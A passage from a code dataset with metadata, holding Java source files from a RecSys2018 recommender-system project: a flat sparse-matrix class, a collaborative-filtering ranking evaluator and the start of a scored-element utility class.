main(args)\n" }, { "alpha_fraction": 0.6439529061317444, "alphanum_fraction": 0.6507313847541809, "avg_line_length": 24.25225257873535, "blob_id": "6ad8de38905044a638c231c64ca15ad1b4e41aa8", "content_id": "cbe306d0666c742ce9361963480e0fac3e4a1875", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 14015, "license_type": "permissive", "max_line_length": 77, "num_lines": 555, "path": "/src/main/java/common/MLSparseMatrixFlat.java", "repo_name": "internetmusic/RecSys2018", "src_encoding": "UTF-8", "text": "package common;\n\nimport java.util.Arrays;\nimport java.util.HashMap;\nimport java.util.Map;\nimport java.util.stream.IntStream;\n\nimport com.google.common.util.concurrent.AtomicDoubleArray;\n\npublic class MLSparseMatrixFlat implements MLSparseMatrix {\n\n\tprivate static final long serialVersionUID = -7708714593085005498L;\n\tpublic static final int MISSING_ROW = -1;\n\n\tprivate int[] indexes;\n\tprivate float[] values;\n\tprivate int nCols;\n\n\tpublic MLSparseMatrixFlat(final int nRowsP, final int nColsP) {\n\t\tthis.indexes = new int[nRowsP];\n\t\tArrays.fill(this.indexes, MISSING_ROW);\n\t\tthis.values = new float[nRowsP];\n\t\tthis.nCols = nColsP;\n\t}\n\n\tpublic MLSparseMatrixFlat(final int[] indexesP, final float[] valuesP,\n\t\t\tfinal int nColsP) {\n\t\tthis.indexes = indexesP;\n\t\tthis.values = valuesP;\n\t\tthis.nCols = nColsP;\n\t}\n\n\t@Override\n\tpublic void applyColNorm(final MLDenseVector colNorm) {\n\t\tIntStream.range(0, this.getNRows()).parallel().forEach(rowIndex -> {\n\t\t\tif (this.indexes[rowIndex] == MISSING_ROW) {\n\t\t\t\treturn;\n\t\t\t}\n\n\t\t\tfloat norm = colNorm.getValue(this.indexes[rowIndex]);\n\t\t\tif (norm > 1e-10f) {\n\t\t\t\tthis.values[rowIndex] /= norm;\n\t\t\t}\n\t\t});\n\t}\n\n\t@Override\n\tpublic void applyColSelector(final Map<Integer, Integer> selectedColMap,\n\t\t\tfinal int nColsSelected) {\n\t\tif (this.nCols == nColsSelected) {\n\t\t\tboolean noChanges = true;\n\t\t\tfor (Map.Entry<Integer, Integer> entry : selectedColMap\n\t\t\t\t\t.entrySet()) {\n\t\t\t\tif (entry.getValue() != entry.getKey()) {\n\t\t\t\t\tnoChanges = false;\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tif (noChanges == true) {\n\t\t\t\t// nothing to do\n\t\t\t\treturn;\n\t\t\t}\n\t\t}\n\n\t\tIntStream.range(0, this.getNRows()).parallel().forEach(rowIndex -> {\n\t\t\tInteger index = this.indexes[rowIndex];\n\t\t\tif (index == MISSING_ROW) {\n\t\t\t\treturn;\n\t\t\t}\n\n\t\t\tindex = selectedColMap.get(index);\n\t\t\tif (index == null) {\n\t\t\t\t// not in the map so remove this row\n\t\t\t\tthis.removeRow(rowIndex);\n\n\t\t\t} else {\n\t\t\t\tthis.indexes[rowIndex] = index;\n\t\t\t}\n\t\t});\n\n\t\tthis.setNCols(nColsSelected);\n\t}\n\n\t@Override\n\tpublic void applyRowNorm(final MLDenseVector rowNorm) {\n\t\tIntStream.range(0, this.getNRows()).parallel().forEach(rowIndex -> {\n\t\t\tif (this.indexes[rowIndex] == MISSING_ROW) {\n\t\t\t\treturn;\n\t\t\t}\n\n\t\t\tfloat norm = rowNorm.getValue(rowIndex);\n\t\t\tif (norm > 1e-5f) {\n\t\t\t\tthis.values[rowIndex] /= norm;\n\t\t\t}\n\t\t});\n\n\t}\n\n\t@Override\n\tpublic void binarizeValues() {\n\t\tArrays.fill(this.values, 1f);\n\t}\n\n\t@Override\n\tpublic MLSparseMatrix deepCopy() {\n\t\treturn new MLSparseMatrixFlat(this.indexes.clone(), this.values.clone(),\n\t\t\t\tthis.nCols);\n\t}\n\n\t@Override\n\tpublic MLDenseVector getColNNZ() {\n\t\tfloat[] colNNZ = new float[this.getNCols()];\n\t\tIntStream.range(0, this.getNRows()).parallel().forEach(rowIndex -> {\n\t\t\tint colIndex = this.indexes[rowIndex];\n\t\t\tif (colIndex == MISSING_ROW) {\n\t\t\t\treturn;\n\t\t\t}\n\t\t\tsynchronized (colNNZ) {\n\t\t\t\tcolNNZ[colIndex] += 1;\n\t\t\t}\n\t\t});\n\t\treturn new MLDenseVector(colNNZ);\n\t}\n\n\t@Override\n\tpublic MLDenseVector getColNorm(final int p) {\n\t\t// compute L^p norm\n\t\tfinal float[] colNorm = new float[this.getNCols()];\n\t\tIntStream.range(0, this.getNRows()).parallel().forEach(rowIndex -> {\n\t\t\tint colIndex = this.indexes[rowIndex];\n\t\t\tif (colIndex == MISSING_ROW) {\n\t\t\t\treturn;\n\t\t\t}\n\t\t\tsynchronized (colNorm) {\n\t\t\t\tif (p == 1) {\n\t\t\t\t\tcolNorm[colIndex] += Math.abs(this.values[rowIndex]);\n\t\t\t\t} else {\n\t\t\t\t\tcolNorm[colIndex] += Math.pow(this.values[rowIndex], p);\n\t\t\t\t}\n\t\t\t}\n\t\t});\n\n\t\tif (p != 1) {\n\t\t\tfor (int i = 0; i < this.getNCols(); i++) {\n\t\t\t\t// take p'th root\n\t\t\t\tcolNorm[i] = (float) Math.pow(colNorm[i], 1.0 / p);\n\t\t\t}\n\t\t}\n\t\treturn new MLDenseVector(colNorm);\n\t}\n\n\t@Override\n\tpublic MLDenseVector getColSum() {\n\t\tfloat[] colSum = new float[this.getNCols()];\n\t\tIntStream.range(0, this.getNRows()).parallel().forEach(rowIndex -> {\n\t\t\tint colIndex = this.indexes[rowIndex];\n\t\t\tif (colIndex == MISSING_ROW) {\n\t\t\t\treturn;\n\t\t\t}\n\t\t\tsynchronized (colSum) {\n\t\t\t\tcolSum[colIndex] += this.values[rowIndex];\n\t\t\t}\n\t\t});\n\t\treturn new MLDenseVector(colSum);\n\t}\n\n\t@Override\n\tpublic MLDenseVector getRowSum() {\n\t\treturn new MLDenseVector(this.values);\n\t}\n\n\t@Override\n\tpublic int getNCols() {\n\t\treturn this.nCols;\n\t}\n\n\t@Override\n\tpublic long getNNZ() {\n\t\tlong nnz = 0;\n\t\tfor (int i = 0; i < this.indexes.length; i++) {\n\t\t\tif (this.indexes[i] != MISSING_ROW) {\n\t\t\t\tnnz++;\n\t\t\t}\n\t\t}\n\t\treturn nnz;\n\t}\n\n\t@Override\n\tpublic int getNRows() {\n\t\treturn this.indexes.length;\n\t}\n\n\t@Override\n\tpublic MLSparseVector getRow(final int rowIndex) {\n\t\tint colIndex = this.indexes[rowIndex];\n\t\tif (colIndex == MISSING_ROW) {\n\t\t\treturn null;\n\t\t}\n\n\t\treturn new MLSparseVector(new int[] { colIndex },\n\t\t\t\tnew float[] { this.values[rowIndex] }, null, this.nCols);\n\t}\n\n\t@Override\n\tpublic MLSparseVector getRow(final int rowIndex, boolean returnEmpty) {\n\t\tMLSparseVector row = this.getRow(rowIndex);\n\t\tif (row == null && returnEmpty == true) {\n\t\t\t// return empty row instead of null\n\t\t\trow = new MLSparseVector(new int[] {}, new float[] {}, null,\n\t\t\t\t\tthis.getNCols());\n\t\t}\n\t\treturn row;\n\t}\n\n\t@Override\n\tpublic MLDenseVector getRowNNZ() {\n\t\tfloat[] rowNNZ = new float[this.getNRows()];\n\t\tIntStream.range(0, this.getNRows()).parallel().forEach(rowIndex -> {\n\t\t\tint colIndex = this.indexes[rowIndex];\n\t\t\tif (colIndex == MISSING_ROW) {\n\t\t\t\treturn;\n\t\t\t}\n\t\t\trowNNZ[rowIndex] = 1;\n\t\t});\n\t\treturn new MLDenseVector(rowNNZ);\n\t}\n\n\t@Override\n\tpublic MLDenseVector getRowNorm(final int p) {\n\t\tfinal float[] rowNorm = new float[this.getNRows()];\n\t\tSystem.arraycopy(values, 0, rowNorm, 0, rowNorm.length);\n\t\treturn new MLDenseVector(rowNorm);\n\t}\n\n\t@Override\n\tpublic boolean hasDates() {\n\t\treturn false;\n\t}\n\n\t@Override\n\tpublic void inferAndSetNCols() {\n\t\t// infer number of columns if it wasn't known during constructor\n\t\tint nColsNew = 0;\n\n\t\tfor (int i = 0; i < this.indexes.length; i++) {\n\t\t\tint colIndex = this.indexes[i];\n\t\t\tif (colIndex == MISSING_ROW) {\n\t\t\t\tcontinue;\n\t\t\t}\n\n\t\t\tif (colIndex + 1 > nColsNew) {\n\t\t\t\t// nCols is 1 + largest col index\n\t\t\t\tnColsNew = colIndex + 1;\n\t\t\t}\n\t\t}\n\n\t\tthis.setNCols(nColsNew);\n\t}\n\n\t@Override\n\tpublic MLSparseMatrix mult(final MLSparseMatrix another) {\n\t\tif (this.getNCols() != another.getNRows()) {\n\t\t\tthrow new IllegalArgumentException(\n\t\t\t\t\t\"this.getNCols() != another.getNRows()\");\n\t\t}\n\t\tMLSparseVector[] resultRows = new MLSparseVector[this.getNRows()];\n\t\tIntStream.range(0, this.getNRows()).parallel().forEach(i -> {\n\t\t\tint index = this.indexes[i];\n\t\t\tif (index == MISSING_ROW) {\n\t\t\t\treturn;\n\t\t\t}\n\t\t\tfloat value = this.values[i];\n\t\t\tfloat[] resultRow = new float[another.getNCols()];\n\t\t\tMLSparseVector rowAnother = another.getRow(index);\n\t\t\tif (rowAnother != null) {\n\n\t\t\t\tint[] indexesAnother = rowAnother.getIndexes();\n\t\t\t\tfloat[] valuesAnother = rowAnother.getValues();\n\t\t\t\tfor (int k = 0; k < indexesAnother.length; k++) {\n\t\t\t\t\tresultRow[indexesAnother[k]] += value * valuesAnother[k];\n\t\t\t\t}\n\t\t\t}\n\t\t\tMLSparseVector resultRowSparse = MLSparseVector\n\t\t\t\t\t.fromDense(new MLDenseVector(resultRow));\n\t\t\tif (resultRowSparse.getIndexes() != null) {\n\t\t\t\tresultRows[i] = resultRowSparse;\n\t\t\t}\n\t\t});\n\n\t\treturn new MLSparseMatrixAOO(resultRows, another.getNCols());\n\t}\n\n\t@Override\n\tpublic MLDenseVector multCol(final MLDenseVector vector) {\n\n\t\t// multiply 1 x nRows dense vector with this matrix\n\t\tif (this.getNRows() != vector.getLength()) {\n\t\t\tthrow new IllegalArgumentException(\n\t\t\t\t\t\"this.getNRows() != vector.getLength()\");\n\t\t}\n\n\t\tAtomicDoubleArray result = new AtomicDoubleArray(this.nCols);\n\t\tIntStream.range(0, this.getNRows()).parallel().forEach(rowIndex -> {\n\t\t\tfloat val = vector.getValue(rowIndex);\n\t\t\tif (val == 0) {\n\t\t\t\treturn;\n\t\t\t}\n\n\t\t\tint colIndex = this.indexes[rowIndex];\n\t\t\tif (colIndex == MISSING_ROW) {\n\t\t\t\treturn;\n\t\t\t}\n\t\t\tfloat colValue = this.values[rowIndex];\n\t\t\tresult.addAndGet(colIndex, val * colValue);\n\t\t});\n\t\tfloat[] temp = new float[this.nCols];\n\t\tfor (int i = 0; i < temp.length; i++) {\n\t\t\ttemp[i] = (float) result.get(i);\n\t\t}\n\n\t\treturn new MLDenseVector(temp);\n\t}\n\n\t@Override\n\tpublic MLDenseVector multCol(final MLSparseVector vector) {\n\n\t\t// multiply 1 x nRows sparse vector with this matrix\n\t\tif (this.getNRows() != vector.getLength()) {\n\t\t\tthrow new IllegalArgumentException(\n\t\t\t\t\t\"this.getNRows() != vector.getLength()\");\n\t\t}\n\n\t\tAtomicDoubleArray result = new AtomicDoubleArray(this.nCols);\n\t\tint[] vectorIndexes = vector.getIndexes();\n\t\tfloat[] vectorValues = vector.getValues();\n\t\tIntStream.range(0, vectorIndexes.length).parallel()\n\t\t\t\t.forEach(rowIndex -> {\n\t\t\t\t\tint ind = vectorIndexes[rowIndex];\n\t\t\t\t\tfloat val = vectorValues[rowIndex];\n\n\t\t\t\t\tint colIndex = this.indexes[ind];\n\t\t\t\t\tif (colIndex == MISSING_ROW) {\n\t\t\t\t\t\treturn;\n\t\t\t\t\t}\n\t\t\t\t\tfloat colValue = this.values[ind];\n\n\t\t\t\t\tresult.addAndGet(colIndex, val * colValue);\n\t\t\t\t});\n\n\t\tfloat[] temp = new float[this.nCols];\n\t\tfor (int i = 0; i < temp.length; i++) {\n\t\t\ttemp[i] = (float) result.get(i);\n\t\t}\n\n\t\treturn new MLDenseVector(temp);\n\t}\n\n\t@Override\n\tpublic MLDenseVector multRow(final MLDenseVector vector) {\n\n\t\t// multiply this matrix with nCols x 1 dense vector\n\t\tif (this.getNCols() != vector.getLength()) {\n\t\t\tthrow new IllegalArgumentException(\n\t\t\t\t\t\"this.getNCols() != vector.getLength()\");\n\t\t}\n\n\t\tfloat[] result = new float[this.getNRows()];\n\t\tIntStream.range(0, this.getNRows()).parallel().forEach(rowIndex -> {\n\t\t\tint colIndex = this.indexes[rowIndex];\n\t\t\tif (colIndex == MISSING_ROW) {\n\t\t\t\treturn;\n\t\t\t}\n\t\t\tfloat colValue = this.values[rowIndex];\n\n\t\t\tresult[rowIndex] = vector.getValue(colIndex) * colValue;\n\t\t});\n\n\t\treturn new MLDenseVector(result);\n\t}\n\n\t@Override\n\tpublic MLDenseVector multRow(final MLSparseVector vector) {\n\n\t\t// multiply this matrix with nCols x 1 sparse vector\n\t\tif (this.getNCols() != vector.getLength()) {\n\t\t\tthrow new IllegalArgumentException(\n\t\t\t\t\t\"this.getNCols() != vector.getLength()\");\n\t\t}\n\n\t\tint[] vecIndexes = vector.getIndexes();\n\t\tfloat[] vecValues = vector.getValues();\n\t\tfloat[] result = new float[this.getNRows()];\n\t\tIntStream.range(0, this.getNRows()).parallel().forEach(rowIndex -> {\n\t\t\tint colIndex = this.indexes[rowIndex];\n\t\t\tif (colIndex == MISSING_ROW) {\n\t\t\t\treturn;\n\t\t\t}\n\t\t\tfloat colValue = this.values[rowIndex];\n\t\t\tint matchIndex = Arrays.binarySearch(vecIndexes, colIndex);\n\t\t\tif (matchIndex >= 0) {\n\t\t\t\tresult[rowIndex] = vecValues[matchIndex] * colValue;\n\t\t\t}\n\t\t});\n\n\t\treturn new MLDenseVector(result);\n\t}\n\n\tprivate void removeRow(final int rowIndex) {\n\t\tthis.indexes[rowIndex] = MISSING_ROW;\n\t}\n\n\t@Override\n\tpublic Map<Integer, Integer> selectCols(final int nnzCutOff) {\n\t\tMap<Integer, Integer> selectedColMap = new HashMap<Integer, Integer>(\n\t\t\t\tthis.nCols);\n\n\t\tMLDenseVector colNNZ = this.getColNNZ();\n\t\tint newIndex = 0;\n\t\tfor (int colIndex = 0; colIndex < this.nCols; colIndex++) {\n\t\t\tif (colNNZ.getValue(colIndex) > nnzCutOff) {\n\t\t\t\tselectedColMap.put(colIndex, newIndex);\n\t\t\t\tnewIndex++;\n\t\t\t}\n\t\t}\n\n\t\treturn selectedColMap;\n\t}\n\n\t@Override\n\tpublic void setNCols(final int nColsP) {\n\t\tthis.nCols = nColsP;\n\n\t}\n\n\tpublic void setRow(final int index, final float value, final int rowIndex) {\n\t\tthis.indexes[rowIndex] = index;\n\t\tthis.values[rowIndex] = value;\n\t}\n\n\t@Override\n\tpublic void setRow(final MLSparseVector row, final int rowIndex) {\n\t\tif (row == null || row.getIndexes().length == 0) {\n\t\t\tthis.removeRow(rowIndex);\n\t\t\treturn;\n\t\t}\n\n\t\tint[] rowIndexes = row.getIndexes();\n\t\tif (rowIndexes.length != 1) {\n\t\t\tthrow new IllegalArgumentException(\n\t\t\t\t\t\"can't add row with != 1 element\");\n\t\t}\n\t\tfloat[] rowValues = row.getValues();\n\n\t\tthis.indexes[rowIndex] = rowIndexes[0];\n\t\tthis.values[rowIndex] = rowValues[0];\n\t}\n\n\t@Override\n\tpublic void toBinFile(final String outFile) throws Exception {\n\t\tthrow new UnsupportedOperationException(\"unsupported function\");\n\t}\n\n\t@Override\n\tpublic MLSparseMatrix transpose() {\n\t\t/**\n\t\t * convert to csr\n\t\t */\n\t\tfinal int nnz = (int) this.getNNZ();\n\t\tfinal int nRows = this.getNRows();\n\t\tfinal int[] jaP = new int[nnz];\n\t\tfinal float[] aP = new float[nnz];\n\t\tfor (int i = 0, inz = 0; i < nRows; i++) {\n\t\t\tint jaPi = this.indexes[i];\n\t\t\tif (jaPi != MISSING_ROW) {\n\t\t\t\tjaP[inz] = jaPi;\n\t\t\t\taP[inz] = this.values[i];\n\t\t\t\tinz++;\n\t\t\t}\n\t\t}\n\t\t/**\n\t\t * perform transpose\n\t\t */\n\t\tfinal int nnzT = nnz;\n\t\tfinal int nRowsT = this.getNCols();\n\t\tfinal int nColsT = this.getNRows();\n\t\tfinal int[] rowIndexT = new int[nRowsT + 1];\n\t\tfinal int[] jaPT = new int[nnzT];\n\t\tfinal float[] aPT = new float[nnzT];\n\n\t\t// count nnz in each row\n\t\tfor (int i = 0; i < nnzT; i++) {\n\t\t\tint jaPi = jaP[i];\n\t\t\tif (jaPi != MISSING_ROW) {\n\t\t\t\trowIndexT[jaPi]++;\n\t\t\t}\n\t\t}\n\n\t\t// Fill starting point of the previous row to begin tally\n\t\tint r, j;\n\t\trowIndexT[nRowsT] = nnzT - rowIndexT[nRowsT - 1];\n\t\tfor (r = nRowsT - 1; r > 0; r--) {\n\t\t\trowIndexT[r] = rowIndexT[r + 1] - rowIndexT[r - 1];\n\t\t}\n\t\trowIndexT[0] = 0;\n\n\t\t// assign the new columns and values\n\t\t// synchronously tally\n\t\t// this is the place to insert extra values like dates\n\t\tfor (int c = 0, i = 0; c < nColsT; c++) {\n\t\t\t// don't need to walk through row, there's only 0/1 vals per row\n\t\t\tif (this.indexes[c] == MISSING_ROW) {\n\t\t\t\tcontinue;\n\t\t\t}\n\t\t\tr = jaP[i];\n\t\t\tj = rowIndexT[r + 1]++;\n\t\t\tjaPT[j] = c;\n\t\t\taPT[j] = aP[i];\n\t\t\ti++;\n\t\t}\n\t\t// TODO: CSR3 -> NIST and parsing can probably be more clever\n\t\tint[] pntrBT = new int[nRowsT];\n\t\tint[] pntrET = new int[nRowsT];\n\t\tint lastActivePtrE = 0;\n\t\tfor (int i = 0; i < nRowsT; i++) {\n\t\t\tif (lastActivePtrE == rowIndexT[i + 1]) {\n\t\t\t\tcontinue;\n\t\t\t}\n\t\t\tpntrET[i] = rowIndexT[i + 1];\n\t\t\tpntrBT[i] = lastActivePtrE;\n\t\t\tlastActivePtrE = rowIndexT[i + 1];\n\t\t}\n\n\t\t/**\n\t\t * consolidate csr (NIST) back to mlsparse\n\t\t */\n\t\tfinal MLSparseVector[] rows = new MLSparseVector[nRowsT];\n\t\tIntStream.range(0, nRowsT).parallel().forEach(i -> {\n\t\t\tint rownnz = pntrET[i] - pntrBT[i];\n\t\t\tif (rownnz == 0) {\n\t\t\t\treturn;\n\t\t\t}\n\t\t\tint[] rowColInds = new int[rownnz];\n\t\t\tfloat[] rowVals = new float[rownnz];\n\t\t\tfor (int jj = 0, k = pntrBT[i]; jj < rownnz; jj++, k++) {\n\t\t\t\trowColInds[jj] = jaPT[k];\n\t\t\t\trowVals[jj] = aPT[k];\n\t\t\t}\n\t\t\tMLSparseVector rowVec = new MLSparseVector(rowColInds, rowVals,\n\t\t\t\t\tnull, nColsT);\n\t\t\trows[i] = rowVec;\n\t\t});\n\t\treturn new MLSparseMatrixAOO(rows, nColsT);\n\t}\n}\n" }, { "alpha_fraction": 0.6904473900794983, "alphanum_fraction": 0.6942765116691589, "avg_line_length": 31.431371688842773, "blob_id": "2d523ef94c3cd1e494ec88eb958bb423efe04258", "content_id": "a84265ff3432e8de8c8fb5b6f533efa38930657e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4962, "license_type": "permissive", "max_line_length": 77, "num_lines": 153, "path": "/src/main/java/common/EvaluatorCF.java", "repo_name": "internetmusic/RecSys2018", "src_encoding": "UTF-8", "text": "package common;\n\nimport java.util.Arrays;\nimport java.util.HashMap;\nimport java.util.Map;\nimport java.util.concurrent.atomic.AtomicInteger;\nimport java.util.stream.IntStream;\n\npublic abstract class EvaluatorCF {\n\n\tprotected int[] threshs;\n\n\tpublic EvaluatorCF(final int[] threshsP) {\n\t\tthis.threshs = threshsP;\n\t}\n\n\tpublic abstract ResultCF evaluate(final SplitterCF split,\n\t\t\tfinal String interactionType, final FloatElement[][] preds);\n\n\tpublic int[] getEvalThreshs() {\n\t\treturn this.threshs;\n\t}\n\n\tpublic int getMaxEvalThresh() {\n\t\treturn this.threshs[this.threshs.length - 1];\n\t}\n\n\tpublic static FloatElement[][] getRankings(SplitterCF split,\n\t\t\tMLDenseMatrix U, MLDenseMatrix V, final int maxThresh,\n\t\t\tfinal String interactionType) {\n\t\tif (Math.floorDiv(LowLevelRoutines.MAX_ARRAY_SIZE, V.getNRows()) >= V\n\t\t\t\t.getNCols()) {\n\t\t\treturn getRankingsNative(split.getRstrain().get(interactionType),\n\t\t\t\t\tsplit.getValidRowIndexes(), split.getValidColIndexes(), U,\n\t\t\t\t\tV, maxThresh, 100);\n\t\t} else {\n\t\t\tSystem.out.printf(\n\t\t\t\t\t\"[WARNING] using non-native ranking can be very slow\");\n\t\t\treturn getRankingsNonNative(split, U, V, maxThresh,\n\t\t\t\t\tinteractionType);\n\t\t}\n\t}\n\n\tpublic static FloatElement[][] getRankingsNative(\n\t\t\tfinal MLSparseMatrix Rtrain, final int[] rowIndexes,\n\t\t\tint[] colIndexes, final MLDenseMatrix U, final MLDenseMatrix V,\n\t\t\tfinal int rankingSize, final int rowBatchSize) {\n\n\t\t// convenience function\n\t\tfloat[] Vflat = V.slice(colIndexes).toFlatArray();\n\t\treturn getRankingsNative(Rtrain, rowIndexes, colIndexes, U, Vflat,\n\t\t\t\trankingSize, rowBatchSize);\n\t}\n\n\tpublic static FloatElement[][] getRankingsNative(\n\t\t\tfinal MLSparseMatrix Rtrain, final int[] rowIndexes,\n\t\t\tfinal int[] colIndexes, final MLDenseMatrix U, final float[] V,\n\t\t\tfinal int rankingSize, final int rowBatchSize) {\n\n\t\tFloatElement[][] rankings = new FloatElement[U.getNRows()][];\n\t\tfinal int nRowsV = colIndexes.length;\n\t\tfinal int nCols = U.getNCols();\n\n\t\tfinal Map<Integer, Integer> colMap = new HashMap<Integer, Integer>();\n\t\tfor (int i = 0; i < colIndexes.length; i++) {\n\t\t\tcolMap.put(colIndexes[i], i);\n\t\t}\n\n\t\tfinal int uBatchSize = Math.min(rowBatchSize,\n\t\t\t\tMath.floorDiv(LowLevelRoutines.MAX_ARRAY_SIZE, nRowsV));\n\t\tint nBatch = -Math.floorDiv(-rowIndexes.length, uBatchSize);\n\n\t\tfor (int batch = 0; batch < nBatch; batch++) {\n\t\t\tfinal int start = batch * uBatchSize;\n\t\t\tfinal int end = Math.min(start + uBatchSize, rowIndexes.length);\n\n\t\t\tfinal float[] result = new float[(end - start) * nRowsV];\n\t\t\tMLDenseMatrix uBatchRows = U.slice(rowIndexes, start, end);\n\t\t\tLowLevelRoutines.sgemm(uBatchRows.toFlatArray(), V, result,\n\t\t\t\t\t(end - start), nRowsV, nCols, true, false, 1, 0);\n\n\t\t\tIntStream.range(0, end - start).parallel().forEach(i -> {\n\t\t\t\tint rowIndex = rowIndexes[start + i];\n\t\t\t\tMLSparseVector trainRow = null;\n\t\t\t\tif (Rtrain != null) {\n\t\t\t\t\ttrainRow = Rtrain.getRow(rowIndex);\n\t\t\t\t}\n\t\t\t\t// map training index to relative index to match sliced V\n\t\t\t\tFloatElement[] preds;\n\t\t\t\tint[] excludes = null;\n\t\t\t\tif (trainRow != null) {\n\t\t\t\t\texcludes = Arrays.stream(trainRow.getIndexes())\n\t\t\t\t\t\t\t.filter(colMap::containsKey).map(colMap::get)\n\t\t\t\t\t\t\t.toArray();\n\t\t\t\t\tif (excludes.length == 0) {\n\t\t\t\t\t\texcludes = null;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tpreds = FloatElement.topNSortOffset(result, rankingSize,\n\t\t\t\t\t\texcludes, i * nRowsV, nRowsV);\n\n\t\t\t\tif (preds != null) {\n\t\t\t\t\t// map back to full index\n\t\t\t\t\tfor (int j = 0; j < preds.length; j++) {\n\t\t\t\t\t\tpreds[j].setIndex(colIndexes[preds[j].getIndex()]);\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\trankings[rowIndex] = preds;\n\t\t\t});\n\t\t}\n\t\treturn rankings;\n\t}\n\n\tprivate static FloatElement[][] getRankingsNonNative(final SplitterCF split,\n\t\t\tfinal MLDenseMatrix U, final MLDenseMatrix V, final int maxThresh,\n\t\t\tfinal String interactionType) {\n\n\t\tMLSparseMatrix R_train = split.getRstrain().get(interactionType);\n\t\tFloatElement[][] rankings = new FloatElement[R_train.getNRows()][];\n\t\tint[] validRowIndexes = split.getValidRowIndexes();\n\t\tint[] validColIndexes = split.getValidColIndexes();\n\t\tAtomicInteger count = new AtomicInteger(0);\n\t\tMLTimer evalTimer = new MLTimer(\"ALS Eval\", validRowIndexes.length);\n\n\t\tIntStream.range(0, validRowIndexes.length).parallel().forEach(index -> {\n\t\t\tfinal int countLocal = count.incrementAndGet();\n\t\t\tif (countLocal % 1000 == 0) {\n\t\t\t\tevalTimer.tocLoop(countLocal);\n\t\t\t}\n\t\t\tint rowIndex = validRowIndexes[index];\n\n\t\t\tMLDenseVector uRow = U.getRow(rowIndex);\n\t\t\tFloatElement[] rowScores = new FloatElement[validColIndexes.length];\n\t\t\tint cur = 0;\n\t\t\tfor (int colIndex : validColIndexes) {\n\t\t\t\trowScores[cur] = new FloatElement(colIndex,\n\t\t\t\t\t\tuRow.mult(V.getRow(colIndex)));\n\t\t\t\tcur++;\n\t\t\t}\n\n\t\t\tMLSparseVector trainRow = R_train.getRow(rowIndex);\n\t\t\tif (trainRow != null) {\n\t\t\t\trankings[rowIndex] = FloatElement.topNSortArr(rowScores,\n\t\t\t\t\t\tmaxThresh, R_train.getRow(rowIndex).getIndexes());\n\t\t\t} else {\n\t\t\t\trankings[rowIndex] = FloatElement.topNSort(rowScores, maxThresh,\n\t\t\t\t\t\tnull);\n\t\t\t}\n\t\t});\n\t\treturn rankings;\n\t}\n\n}\n" }, { "alpha_fraction": 0.6742296814918518, "alphanum_fraction": 0.6805322170257568, "avg_line_length": 24.140844345092773, "blob_id": "80784f22c38b6ca2d81120758ba3094f72d9c84b", "content_id": "a7e845050bfa61df15c03ec5781a746e0a374e30", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 7140, "license_type": "permissive", "max_line_length": 82, "num_lines": 284, "path": "/src/main/java/common/FloatElement.java", "repo_name": "internetmusic/RecSys2018", "src_encoding": "UTF-8", "text": "package common;\n\nimport java.io.Serializable;\nimport java.util.Arrays;\nimport java.util.Comparator;\nimport java.util.HashSet;\nimport java.util.PriorityQueue;\nimport java.util.Set;\nimport java.util.stream.IntStream;\n\npublic class FloatElement implements Serializable {\n\n\tpublic static class IndexComparator implements Comparator<FloatElement> {\n\n\t\tprivate boolean decreasing;\n\n\t\tpublic IndexComparator(final boolean decreasingP) {\n\t\t\tthis.decreasing = decreasingP;\n\t\t}\n\n\t\t@Override\n\t\tpublic int compare(final FloatElement e1, final FloatElement e2) {\n\t\t\tif (this.decreasing == true) {\n\t\t\t\treturn Integer.compare(e2.index, e1.index);\n\t\t\t} else {\n\t\t\t\treturn Integer.compare(e1.index, e2.index);\n\t\t\t}\n\t\t}\n\t}\n\n\tpublic static class ValueComparator implements Comparator<FloatElement> {\n\n\t\tprivate boolean decreasing;\n\n\t\tpublic ValueComparator(final boolean decreasingP) {\n\t\t\tthis.decreasing = decreasingP;\n\t\t}\n\n\t\t@Override\n\t\tpublic int compare(final FloatElement e1, final FloatElement e2) {\n\t\t\tif (this.decreasing == true) {\n\t\t\t\treturn Float.compare(e2.value, e1.value);\n\t\t\t} else {\n\t\t\t\treturn Float.compare(e1.value, e2.value);\n\t\t\t}\n\t\t}\n\t}\n\n\tprivate static final long serialVersionUID = -4838379190571020403L;\n\tprivate int index;\n\tprivate float value;\n\tprivate Object other;\n\n\tpublic FloatElement(final int indexP, final float valueP) {\n\t\tthis.index = indexP;\n\t\tthis.value = valueP;\n\t}\n\n\tpublic FloatElement(final int indexP, final float valueP,\n\t\t\tfinal Object otherP) {\n\t\tthis.index = indexP;\n\t\tthis.value = valueP;\n\t\tthis.other = otherP;\n\t}\n\n\tpublic int getIndex() {\n\t\treturn this.index;\n\t}\n\n\tpublic Object getOther() {\n\t\treturn this.other;\n\t}\n\n\tpublic float getValue() {\n\t\treturn this.value;\n\t}\n\n\tpublic void setIndex(final int indexP) {\n\t\tthis.index = indexP;\n\t}\n\n\tpublic void setOther(final Object otherP) {\n\t\tthis.other = otherP;\n\t}\n\n\tpublic void setValue(final float valueP) {\n\t\tthis.value = valueP;\n\t}\n\n\tpublic static void standardize(final FloatElement[][] scores) {\n\t\t// in place row-based score standarization\n\t\tIntStream.range(0, scores.length).parallel().forEach(i -> {\n\t\t\tFloatElement[] row = scores[i];\n\t\t\tif (row == null) {\n\t\t\t\treturn;\n\t\t\t}\n\n\t\t\tstandardize(row);\n\t\t});\n\t}\n\n\tpublic static void standardize(final FloatElement[] scores) {\n\t\tfloat mean = 0f;\n\t\tfor (FloatElement element : scores) {\n\t\t\tmean += element.value;\n\t\t}\n\t\tmean = mean / scores.length;\n\n\t\tfloat std = 0f;\n\t\tfor (FloatElement element : scores) {\n\t\t\tstd += (element.value - mean) * (element.value - mean);\n\t\t}\n\t\tstd = (float) Math.sqrt(std / scores.length);\n\n\t\tif (std > 1e-5) {\n\t\t\tfor (FloatElement element : scores) {\n\t\t\t\telement.value = (element.value - mean) / std;\n\t\t\t}\n\t\t}\n\t}\n\n\tpublic static FloatElement[] topNSort(final float[] vec, final int topN,\n\t\t\tfinal int[] exclusions) {\n\t\tSet<Integer> exclusionSet = new HashSet<Integer>(exclusions.length);\n\t\tfor (int exclusion : 